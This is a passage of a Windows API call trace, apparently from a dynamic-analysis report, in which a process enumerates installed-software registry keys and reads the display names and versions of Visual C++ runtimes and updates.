lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x24, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x25, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x26, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x27, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x28, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x29, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegEnumKeyExW (in: hKey=0x354, dwIndex=0x2a, lpName=0x2457bf4, lpcchName=0x36f2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x36f2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0215.237] RegOpenKeyExW (in: hKey=0x354, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.238] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.238] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.238] RegCloseKey (hKey=0x358) returned 0x0 [0215.238] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.238] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.238] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.239] RegCloseKey (hKey=0x358) returned 0x0 [0215.239] RegOpenKeyExW (in: hKey=0x354, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.239] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.239] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.239] RegCloseKey (hKey=0x358) returned 0x0 [0215.239] RegOpenKeyExW (in: hKey=0x354, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.240] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.240] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.240] RegCloseKey (hKey=0x358) returned 0x0 [0215.240] RegOpenKeyExW (in: hKey=0x354, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.240] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.240] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.240] RegCloseKey (hKey=0x358) returned 0x0 [0215.241] RegOpenKeyExW (in: hKey=0x354, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.241] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.241] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.241] RegCloseKey (hKey=0x358) returned 0x0 [0215.241] RegOpenKeyExW (in: hKey=0x354, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.242] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.242] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.242] RegCloseKey (hKey=0x358) returned 0x0 [0215.242] RegOpenKeyExW (in: hKey=0x354, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.242] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.242] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.242] RegCloseKey (hKey=0x358) returned 0x0 [0215.243] RegOpenKeyExW (in: hKey=0x354, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.243] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.243] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.243] RegCloseKey (hKey=0x358) returned 0x0 [0215.243] RegOpenKeyExW (in: hKey=0x354, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.243] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.243] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.243] RegCloseKey (hKey=0x358) returned 0x0 [0215.244] RegOpenKeyExW (in: hKey=0x354, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.244] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.244] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.244] RegCloseKey (hKey=0x358) returned 0x0 [0215.244] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.245] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7e) returned 0x0 [0215.245] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2459e48, lpcbData=0x36f2d0*=0x7e | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x36f2d0*=0x7e) returned 0x0 [0215.245] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x18) returned 0x0 [0215.245] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2459fb4, lpcbData=0x36f2d0*=0x18 | out: lpType=0x36f2d4*=0x1, lpData="14.25.28508", lpcbData=0x36f2d0*=0x18) returned 0x0 [0215.376] RegCloseKey (hKey=0x358) returned 0x0 [0215.376] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.376] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x76) returned 0x0 [0215.376] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x245f8a8, lpcbData=0x36f2d0*=0x76 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x36f2d0*=0x76) returned 0x0 [0215.377] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.377] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x245fa04, lpcbData=0x36f2d0*=0x16 | out: lpType=0x36f2d4*=0x1, lpData="12.0.21005", lpcbData=0x36f2d0*=0x16) returned 0x0 [0215.377] RegCloseKey (hKey=0x358) returned 0x0 [0215.377] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.377] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.377] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.378] RegCloseKey (hKey=0x358) returned 0x0 [0215.378] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.378] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.378] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.378] RegCloseKey (hKey=0x358) returned 0x0 [0215.379] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.379] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.379] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.379] RegCloseKey (hKey=0x358) returned 0x0 [0215.379] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.379] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.379] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.379] RegCloseKey (hKey=0x358) returned 0x0 [0215.380] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.380] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.380] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.380] RegCloseKey (hKey=0x358) returned 0x0 [0215.380] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.381] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.381] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.381] RegCloseKey (hKey=0x358) returned 0x0 [0215.381] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.381] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.381] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x0, lpData=0x0, lpcbData=0x36f2d0*=0x0) returned 0x2 [0215.381] RegCloseKey (hKey=0x358) returned 0x0 [0215.382] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.382] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x78) returned 0x0 [0215.382] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2460a28, lpcbData=0x36f2d0*=0x78 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x36f2d0*=0x78) returned 0x0 [0215.382] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x18) returned 0x0 [0215.382] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2460b84, lpcbData=0x36f2d0*=0x18 | out: lpType=0x36f2d4*=0x1, lpData="14.25.28508", lpcbData=0x36f2d0*=0x18) returned 0x0 [0215.382] RegCloseKey (hKey=0x358) returned 0x0 [0215.383] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.383] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.383] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2460efc, lpcbData=0x36f2d0*=0x7a | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.383] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.383] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461060, lpcbData=0x36f2d0*=0x1a | out: lpType=0x36f2d4*=0x1, lpData="11.0.61030.0", lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.383] RegCloseKey (hKey=0x358) returned 0x0 [0215.384] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.384] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.384] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x24613e4, lpcbData=0x36f2d0*=0x7a | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x36f2d0*=0x7a) returned 0x0 [0215.385] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.385] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461554, lpcbData=0x36f2d0*=0x1a | out: lpType=0x36f2d4*=0x1, lpData="12.0.30501.0", lpcbData=0x36f2d0*=0x1a) returned 0x0 [0215.385] RegCloseKey (hKey=0x358) returned 0x0 [0215.385] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.385] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x86) returned 0x0 [0215.385] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461904, lpcbData=0x36f2d0*=0x86 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x36f2d0*=0x86) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1c) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461a80, lpcbData=0x36f2d0*=0x1c | out: lpType=0x36f2d4*=0x1, lpData="14.25.28508.3", lpcbData=0x36f2d0*=0x1c) returned 0x0 [0215.386] RegCloseKey (hKey=0x358) returned 0x0 [0215.386] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x86) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461e14, lpcbData=0x36f2d0*=0x86 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x36f2d0*=0x86) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x1c) returned 0x0 [0215.386] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2461f90, lpcbData=0x36f2d0*=0x1c | out: lpType=0x36f2d4*=0x1, lpData="14.25.28508.3", lpcbData=0x36f2d0*=0x1c) returned 0x0 [0215.387] RegCloseKey (hKey=0x358) returned 0x0 [0215.387] RegOpenKeyExW (in: hKey=0x354, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x36f2b4 | out: phkResult=0x36f2b4*=0x358) returned 0x0 [0215.387] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x0, lpcbData=0x36f2d0*=0x0 | out: lpType=0x36f2d4*=0x1, lpData=0x0, lpcbData=0x36f2d0*=0x54) returned 0x0 [0215.388] RegQueryValueExW (in: hKey=0x358, lpValueName="DisplayName", lpReserved=0x0, lpType=0x36f2d4, lpData=0x2462324, lpcbData=0x36f2d0*=0x54 | out: lpType=0x36f2d4*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x36f2d0*=0x54) returned 0x0 